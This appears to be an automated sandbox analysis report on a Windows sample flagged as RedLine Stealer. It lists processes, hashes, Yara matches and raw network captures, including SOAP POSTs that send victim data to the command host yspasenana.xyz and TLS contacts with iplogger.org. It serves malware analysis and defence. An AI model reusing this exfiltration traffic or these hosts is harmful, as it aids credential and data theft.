                                                                                                                                                                            Data Ascii: ngLwCWZhvUc5KceCjtBCsATOI2UfgYQfetJPSz9+2o/F3+qW39zznmZh3ceYhQ2e6DufbwRxQ0+bO39/tLn2J7uZa3/8Kvu6q7nujNeY63+6m7nhZ681N/78dZbXmz/88o3mpl+9ydx85pvNLWe/1dzy67eZ2855u7ntN+80t69+l7n93P80d5z3HnPHb99r7jr//eauC//Lsru5+6I9zDVn/5frAGuSALzjjjsctzO3j7jt9ts
                                                                                                                                                                            Jul 22, 2021 11:44:11.851100922 CEST7008OUTData Raw: 56 53 7a 38 6e 36 77 6c 6f 44 6b 32 68 35 37 66 55 2f 47 7a 6a 4a 4d 79 6f 50 57 58 5a 72 52 6d 43 33 48 37 36 54 58 44 6f 6b 32 44 47 4b 55 4a 31 36 4f 31 6f 48 58 51 49 49 44 31 4f 38 4c 56 51 57 39 48 48 6f 59 51 61 51 61 72 76 32 33 44 67 47
                                                                                                                                                                            Data Ascii: VSz8n6wloDk2h57fU/GzjJMyoPWXZrRmC3H76TXDok2DGKUJ16O1oHXQIID1O8LVQW9HHoYQaQarv23DgGCfPZZ877D1EHA9loq4fpVAwddFKwD5ybwS6Ok9iXySj7jppz81v/3nfzY3/+pX5uazzoKiLyf7kPD7ruU7Ld+2zK4AlLRP/11+rIW+B/Bkc90ZrzY3tE8BkgBsfgyEfg2YBeBbze3yY8C/bT4GvKYJwKOSAlCJP+L
                                                                                                                                                                            Jul 22, 2021 11:44:12.285859108 CEST8049INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:12 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.349742212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:12.465971947 CEST8050OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 1125483
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 22, 2021 11:44:12.515531063 CEST8050INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:12.516504049 CEST8063OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65
                                                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>CH</a:Count
                                                                                                                                                                            Jul 22, 2021 11:44:12.564598083 CEST8073OUTData Raw: 65 54 75 48 6a 71 6c 79 64 41 6c 41 78 73 63 54 4d 6a 62 4c 78 47 64 49 74 6b 6c 51 62 49 50 53 49 56 4a 35 35 48 61 45 54 4f 76 7a 69 50 6a 52 45 77 69 2b 4c 6b 4b 68 35 4a 38 38 61 39 45 66 75 57 57 67 6a 43 75 45 66 30 44 45 73 66 56 7a 41 6c
                                                                                                                                                                            Data Ascii: eTuHjqlydAlAxscTMjbLxGdItklQbIPSIVJ55HaETOvziPjREwi+LkKh5J88a9EfuWWgjCuEf0DEsfVzAlZs9VdVBHXSMtDRnkeLPl8Np8ulT+6n9woSgDkJyPtToDwOf1x1HXV87rfrfkJrDwvo/1mAAIyQ91sHWgCmoXEhDx5/uojHny5kvdD+GvT8Pi5wjgGgvERpOga36RqM/g871V5JUOwwA6CYqAYUcwWo+CzIJ/el0MJ
                                                                                                                                                                            Jul 22, 2021 11:44:12.564752102 CEST8087OUTData Raw: 6b 51 75 6a 43 46 53 6d 51 4c 63 33 67 39 49 53 4b 47 30 58 71 42 77 45 79 6a 73 75 55 76 4c 6c 30 47 33 4b 32 2b 4d 46 63 7a 64 79 2f 74 66 78 77 64 42 49 34 59 65 51 73 56 79 53 75 51 44 73 6a 5a 52 6c 61 4c 39 47 70 74 66 41 39 4e 73 38 72 78
                                                                                                                                                                            Data Ascii: kQujCFSmQLc3g9ISKG0XqBwEyjsuUvLl0G3K2+MFczdy/tfxwdBI4YeQsVySuQDsjZRlaL9GptfA9Ns8rx/bPt8RlAWOJbdBUNv1wF8nfT1ZAAoRSOKPgX2CUP0q6pvc/8E9MyjoY8MSMD6MBYjRc8gxDqLmezSGjoUaV7uAcxgA5YWgOo0Bmrc0KB/TlUaWMwQ6ntGgGGhQwNplFvDrC7FeWRLQOnA5oOsvz8kyifblMmtA136
                                                                                                                                                                            Jul 22, 2021 11:44:12.605175972 CEST8089OUTData Raw: 66 38 55 75 76 6c 35 4e 38 39 6c 4a 36 2f 38 49 4f 55 58 31 33 58 36 56 2f 65 73 6b 73 38 73 36 39 32 6a 4b 73 76 6b 58 36 4f 4f 62 68 43 31 76 67 63 51 65 53 5a 7a 56 42 35 6a 74 2f 2b 69 70 6a 61 42 36 70 62 30 47 66 32 54 54 37 37 43 66 7a 58
                                                                                                                                                                            Data Ascii: f8Uuvl5N89lJ6/8IOUX13X6V/esks8s692jKsvkX6OObhC1vgcQeSZzVB5jt/+ipjaB6pb0Gf2TT77CfzXuy2YX+JjHnRGQrACmfPI6TuMQzmzJ2obYa1c+VR1KRcPmoTrb9qA3X+fc2HXhPx6H2A+3kJ2J9jehYJPAIWUfeTk8Z/gVJN3Fu1OeIe1D9bXqSp3Q+T9k/bhvqA/rc0PF0X9HtSWJNHtPl4XLp3O0+e268mOx6de0
                                                                                                                                                                            Jul 22, 2021 11:44:12.612040997 CEST8092OUTData Raw: 38 46 74 36 6e 4e 64 73 54 39 39 39 53 4e 4b 4f 68 44 37 39 49 49 67 58 79 37 5a 73 45 6e 78 55 44 33 6f 36 56 33 30 45 4f 4e 6e 6e 62 62 71 46 2b 32 35 71 2b 46 65 73 6d 31 2b 79 74 6e 32 49 6f 66 75 49 66 69 57 59 76 69 63 43 42 41 51 6a 55 46
                                                                                                                                                                            Data Ascii: 8Ft6nNdsT999SNKOhD79IIgXy7ZsEnxUD3o6V30EONnnbbqF+25q+Fesm1+ytn2IofuIfiWYvicCBAQjUFCSRgdAcwGYR0qqPqAyJVF7qPbUROlBmQSqC0QLCSA1soBjl6DrgdKE2L4G0O2RA7Vn1L9TwDotX3y7o2sq0P1DAxerFSCpVwMqMwAsmgPoHHvg5yz6W4DaKEck/9Y2AegFWQIl1JD0k+j0k2e6AlDuS+3PIgUgAaW
                                                                                                                                                                            Jul 22, 2021 11:44:12.612334967 CEST8095OUTData Raw: 72 4b 2b 55 4e 53 53 49 53 4e 52 77 4f 31 45 64 4b 54 31 4a 4e 73 72 44 64 65 52 7a 35 6e 49 6b 4c 41 41 64 34 6e 72 59 76 78 63 32 73 59 4d 63 44 65 51 6b 41 57 31 65 45 6f 48 42 2b 66 41 35 4f 35 45 6b 32 6f 48 32 6b 62 52 6a 4f 44 30 39 2f 65
                                                                                                                                                                            Data Ascii: rK+UNSSISNRwO1EdKT1JNsrDdeRz5nIkLAAd4nrYvxc2sYMcDeQkAW1eEoHB+fA5O5Ek2oH2kbRjOD09/ee+P9C2AbWFK2OLNCR13FNa9nyoLUAb+YW6vkbu3MQ58zZKQ2mpD7IElGnadK5PkfzbjP6Xy3Zk1TYeuY3KzfUVOg7nA8f09ZX75HbexveGhvbbst11axeg8J5jAWjh+yc6BvPgh9p7a5sG+tuyuMFjzOKGT3CvvM2
                                                                                                                                                                            Jul 22, 2021 11:44:12.612390995 CEST8100OUTData Raw: 78 67 69 64 64 6d 30 52 67 43 67 4e 4f 6a 2b 4e 4c 71 63 4c 56 45 59 4f 31 43 59 31 6f 44 49 6c 71 49 34 42 37 66 31 52 43 6e 38 6e 49 46 4f 36 55 49 6c 6f 42 65 44 43 53 6c 72 45 53 4d 4c 6a 52 66 65 73 50 6a 2f 51 4a 6c 33 77 78 35 49 49 58 64
                                                                                                                                                                            Data Ascii: xgiddm0RgCgNOj+NLqcLVEYO1CY1oDIlqI4B7f1RCn8nIFO6UIloBeDCSlrESMLjRfesPj/QJl3wx5IIXd6aAl9ftC9At69CXw8Nllo1gL6B+hSB0sIylxPonCpBbTUXgMPQWa+1VwAubvscj95XjBCACNh3BTVpJ4EUgBMXgejeh2NKBWDMJ/z4DvZJ0PxaA4oZIbz2UWsgKf0kfo2r4t0cqRh5SGQs3vDkIqToQEC5UQKSUnO
                                                                                                                                                                            Jul 22, 2021 11:44:12.612554073 CEST8111OUTData Raw: 6b 77 49 64 4e 34 58 4f 4a 39 2f 7a 4e 70 6c 57 76 75 2b 44 4b 43 4d 53 43 53 58 6c 64 36 52 42 38 6f 39 41 73 6f 53 59 43 38 42 77 50 78 4a 55 30 79 52 71 66 38 30 4d 43 55 41 70 2f 6c 49 43 4d 45 64 77 33 6b 6a 32 49 55 41 66 6c 69 44 70 4a 33
                                                                                                                                                                            Data Ascii: kwIdN4XOJ9/zNplWvu+DKCMSCSXld6RB8o9AsoSYC8BwPxJU0yRqf80MCUAp/lICMEdw3kj2IUAfliDpJ3H3Cd1zErENCUB5j6JtnprxgdJK2u0ch/r5VlIwFqO5sAY4p9UA5vaJI9cnan1VC1pz18Dr+b4gCScZ91eCZb4SUBkTBUm5aYLqNARQ9iFUfwB9LIfOPy34+Iub7gCRdcwxeQGIpEwOVIZEpUd1cqBzaalpLH28kjq
                                                                                                                                                                            Jul 22, 2021 11:44:12.612983942 CEST8134OUTData Raw: 43 57 5a 68 76 55 63 35 4b 63 65 43 6a 74 42 43 73 41 54 4f 49 32 55 66 67 59 51 66 65 74 4a 50 53 7a 39 2b 32 6f 2f 46 33 2b 71 57 33 39 7a 7a 6e 6d 5a 68 33 63 65 59 68 51 32 65 36 44 75 66 62 77 52 78 51 30 2b 62 4f 33 39 2f 74 4c 6e 32 4a 37
                                                                                                                                                                            Data Ascii: CWZhvUc5KceCjtBCsATOI2UfgYQfetJPSz9+2o/F3+qW39zznmZh3ceYhQ2e6DufbwRxQ0+bO39/tLn2J7uZa3/8Kvu6q7nujNeY63+6m7nhZ681N/78dZbXmz/88o3mpl+9ydx85pvNLWe/1dzy67eZ2855u7ntN+80t69+l7n93P80d5z3HnPHb99r7jr//eauC//Lsru5+6I9zDVn/5frAGuSALzjjjsctzO3j7jt9tsF9v1
                                                                                                                                                                            Jul 22, 2021 11:44:12.652571917 CEST8137OUTData Raw: 69 39 73 6d 52 36 41 46 34 45 70 49 51 46 75 6e 50 63 37 63 62 55 70 34 32 31 4c 67 62 63 37 67 76 4f 49 66 31 30 49 36 58 30 55 52 57 4d 72 41 63 49 35 65 32 72 39 6c 63 6a 38 61 62 6c 69 36 72 77 66 46 44 65 70 61 34 57 4d 45 49 46 69 67 41 50
                                                                                                                                                                            Data Ascii: i9smR6AF4EpIQFunPc7cbUp421Lgbc7gvOIf10I6X0URWMrAcI5e2r9lcj8abli6rwfFDepa4WMEIFigAPSuv4OROxpmIcWrfrwxGC8W1/QKQKGsGzFO+5tygBUQgHb4WCbI/Rh878LZNoxTNq6riynrLdM4jNBz5B+w5QS7PKOZ7HxcIbsSlXG4LUUCVPCZq77RnPaMP2yOe/J7MhCg3nzzzc0HPvCBQuwJfYJPJN8Y0Se8inh
                                                                                                                                                                            Jul 22, 2021 11:44:13.002619982 CEST9171INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:12 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0


                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                            Jul 22, 2021 11:42:58.915039062 CEST88.99.66.31443192.168.2.349711CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Jul 22, 2021 11:42:59.480372906 CEST104.25.234.53443192.168.2.349712CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jun 11 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Sat Jun 11 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                            Jul 22, 2021 11:43:00.024015903 CEST104.192.141.1443192.168.2.349713CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 27 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Mon May 23 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                            Jul 22, 2021 11:43:00.820909977 CEST52.217.201.169443192.168.2.349715CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 11 01:00:00 CET 2021 Tue Dec 08 13:05:07 CET 2015Sat Feb 12 00:59:59 CET 2022 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025

                                                                                                                                                                            Code Manipulations

                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:42:57
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\kS2dqbsDwD.exe'
                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                            File size:598944 bytes
                                                                                                                                                                            MD5 hash:888AB99280A081717EC5C5749266D1BD
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:43:03
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\325.exe 325
                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                            File size:979968 bytes
                                                                                                                                                                            MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 33%, ReversingLabs
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:43:44
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:{path}
                                                                                                                                                                            Imagebase:0x6b0000
                                                                                                                                                                            File size:979968 bytes
                                                                                                                                                                            MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessageTimerWire
                                                                                                                                                                              • String ID: #32770$C:\Users\user\Desktop$MZ@$call
                                                                                                                                                                              • API String ID: 2557253243-2385611772
                                                                                                                                                                              • Opcode ID: 58c19b412f63fddfb88de8116e6fc38fa378b9250b005aac9534c78de9d4bc27
                                                                                                                                                                              • Instruction ID: cd72fd80d9fc3913f8d5bc22bb4b7d38fe5eb4e655b5691a0bbb5f0414b09c5c
                                                                                                                                                                              • Opcode Fuzzy Hash: 58c19b412f63fddfb88de8116e6fc38fa378b9250b005aac9534c78de9d4bc27
                                                                                                                                                                              • Instruction Fuzzy Hash: 05F2BCB27057808AEB66CF2AE5943E937A1F78DBC4F144126EB4A47BB5DB78C941C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00000001400A2B14: RtlAcquirePebLock.NTDLL ref: 00000001400A2B24
                                                                                                                                                                              • RegisterClipboardFormatW.USER32 ref: 0000000140043B2B
                                                                                                                                                                                • Part of subcall function 00000001400A2AB4: RtlAcquirePebLock.NTDLL ref: 00000001400A2AC4
                                                                                                                                                                                • Part of subcall function 00000001400A2AB4: RtlLeaveCriticalSection.NTDLL ref: 00000001400A2B04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcquireLock$ClipboardCriticalFormatLeaveRegisterSection
                                                                                                                                                                              • String ID: $D$MZ@$TaskbarCreated
                                                                                                                                                                              • API String ID: 3204332510-1372881053
                                                                                                                                                                              • Opcode ID: 6233dde848d130efb6c3b4ed110b9a9e38cb8e0674c939a0605f92c27d8814da
                                                                                                                                                                              • Instruction ID: 44d09944b129bc0f4644ff7b7632f5aa6743972d147f967da645f6f3c28f9c93
                                                                                                                                                                              • Opcode Fuzzy Hash: 6233dde848d130efb6c3b4ed110b9a9e38cb8e0674c939a0605f92c27d8814da
                                                                                                                                                                              • Instruction Fuzzy Hash: 6422877520474087EB3ACB53E8947A977A1F78CBC8F464025EB8A43BB5CB78D945CB08
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$Window$Load$Create$ClassShow$ButtonCapsCheckedDeviceFindLibraryLockMenuMetricsRegisterSystem$AcceleratorsCursorEnableEnumFontForegroundFreeFromIconItemLongNameNamesReleaseSizeof
                                                                                                                                                                              • String ID: AutoHotkey$AutoHotkey2$C:\Users\user\Desktop$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
                                                                                                                                                                              • API String ID: 2916389481-3248659932
                                                                                                                                                                              • Opcode ID: a7eddf3aa53c67af6d7525cfe5bf920316d34c5c9aa0d2fc96734a683c634aca
                                                                                                                                                                              • Instruction ID: 73b09161c7793541a1af2631c91434c6f009a098228376b2858bb7f75dd8e53b
                                                                                                                                                                              • Opcode Fuzzy Hash: a7eddf3aa53c67af6d7525cfe5bf920316d34c5c9aa0d2fc96734a683c634aca
                                                                                                                                                                              • Instruction Fuzzy Hash: 5EC15732608B4186E762CB66F85039A73A4FB8CBD4F64012AEF8957BB4DF79C545DB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
